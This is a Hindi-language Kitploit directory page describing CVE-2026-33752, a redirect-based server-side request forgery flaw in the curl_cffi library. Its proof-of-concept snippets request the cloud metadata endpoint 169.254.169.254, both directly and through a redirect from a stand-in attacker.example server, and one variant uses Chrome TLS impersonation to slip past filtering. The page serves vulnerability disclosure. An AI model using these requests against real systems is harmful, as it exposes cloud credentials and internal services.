Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33752 — curl_cffi में रीडायरेक्ट-आधारित SSRF भेद्यता का प्रदर्शन करता है जो आंतरिक नेटवर्क तक पहुँच की अनुमति देता है, साथ ही PoC कोड और TLS प्रतिरूपण बाईपास का विश्लेषण भी शामिल है। | Kitploit
उपकरण/GitHubGitHub/redyank/cve-2026-33752
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubredyank/cve-2026-33752

CVE-2026-33752

curl_cffi में रीडायरेक्ट-आधारित SSRF भेद्यता का प्रदर्शन करता है जो आंतरिक नेटवर्क तक पहुँच की अनुमति देता है, साथ ही PoC कोड और TLS प्रतिरूपण बाईपास का विश्लेषण भी शामिल है।

रिपॉजिटरी देखें
155 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33752

CVE-2026-33752 (curl_cffi में रीडायरेक्ट-आधारित SSRF जिससे आंतरिक नेटवर्क तक पहुंच संभव होती है)

सारांश

curl_cffi आंतरिक IP रेंज तक अनुरोधों को प्रतिबंधित नहीं करता है, और अंतर्निहित libcurl के माध्यम से स्वचालित रूप से रीडायरेक्ट का अनुसरण करता है।

इसके कारण, एक हमलावर-नियंत्रित URL अनुरोधों को क्लाउड मेटाडेटा एंडपॉइंट जैसी आंतरिक सेवाओं पर रीडायरेक्ट कर सकता है। इसके अतिरिक्त, curl_cffi की TLS इम्पर्सनेशन सुविधा इन अनुरोधों को वैध ब्राउज़र ट्रैफ़िक के रूप में प्रदर्शित कर सकती है, जो कुछ नेटवर्क नियंत्रणों को बायपास कर सकती है।

विवरण

यह समस्या इस बात से उत्पन्न होती है कि curl_cffi आउटबाउंड अनुरोधों को कैसे संभालता है

  • उपयोगकर्ता-आपूर्ति किए गए URL सीधे libcurl को पास किए जाते हैं, बिना यह जांचे कि वे आंतरिक IP रेंज (जैसे, 127.0.0.1, 169.254.0.0/16) में हल होते हैं या नहीं।
  • रीडायरेक्ट स्वचालित रूप से libcurl के अंदर अनुसरण किए जाते हैं (CURLOPT_FOLLOWLOCATION = 1)।
  • Python परत पर रीडायरेक्ट गंतव्यों का कोई सत्यापन नहीं होता है।

इसका मतलब है कि भले ही कोई एप्लिकेशन केवल बाहरी URL के लिए अनुरोधों की अनुमति देता है, एक हमलावर यह कर सकता है

  • हमलावर-नियंत्रित सर्वर की ओर इशारा करने वाला URL प्रदान करें
  • आंतरिक सेवा की ओर इशारा करने वाला रीडायरेक्ट प्रतिक्रिया लौटाएं
  • curl_cffi को उस रीडायरेक्ट का स्वचालित रूप से अनुसरण करने दें

परिणामस्वरूप, आंतरिक एंडपॉइंट (जैसे क्लाउड इंस्टेंस मेटाडेटा API) तक पहुंचा जा सकता है।

इसके अतिरिक्त, curl_cffi TLS फिंगरप्रिंट इम्पर्सनेशन का समर्थन करता है (जैसे, impersonate="chrome")। ऐसे वातावरणों में जहां आउटबाउंड अनुरोध TLS फिंगरप्रिंटिंग के आधार पर फ़िल्टर किए जाते हैं, यह ऐसे अनुरोधों का पता लगाना या उन्हें ब्लॉक करना कठिन बना सकता है।

यह व्यवहार पहले रिपोर्ट किए गए रीडायरेक्ट-आधारित SSRF मुद्दों जैसे CVE-2025-68616 के समान है, जहां रीडायरेक्ट ने अनपेक्षित आंतरिक संसाधनों तक पहुंच की अनुमति दी थी।

PoC

  1. सीधा आंतरिक अनुरोध
root@kitploit:~
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
  1. आंतरिक सेवा पर रीडायरेक्ट हमलावर सर्वर:
root@kitploit:~
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/

पीड़ित कोड:

root@kitploit:~
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)

परिणाम

  • प्रारंभिक अनुरोध हमलावर सर्वर पर जाता है
  • रीडायरेक्ट लौटाया जाता है
  • libcurl स्वचालित रूप से रीडायरेक्ट का अनुसरण करता है
  • आंतरिक मेटाडेटा एंडपॉइंट तक पहुंचा जाता है
  1. TLS इम्पर्सनेशन के साथ
root@kitploit:~
import curl_cffi\
resp = curl_cffi.get(
    "https://attacker.example/test",
    impersonate="chrome")

कुछ वातावरणों में, यह अनुरोध को TLS-आधारित फ़िल्टरिंग नियंत्रणों को बायपास करने में मदद कर सकता है।

प्रभाव

एक हमलावर जो अनुरोधित URL को नियंत्रित कर सकता है, वह निम्न में सक्षम हो सकता है:

  • आंतरिक नेटवर्क सेवाओं तक पहुंचना
  • क्लाउड मेटाडेटा एंडपॉइंट तक पहुंचना और संवेदनशील जानकारी प्राप्त करना
  • कुछ आउटबाउंड फ़िल्टरिंग तंत्रों को बायपास करना (वातावरण पर निर्भर करता है) यह CWE-918 सर्वर-साइड रिक्वेस्ट फोर्जरी के अनुरूप है।
टूल डाउनलोड करें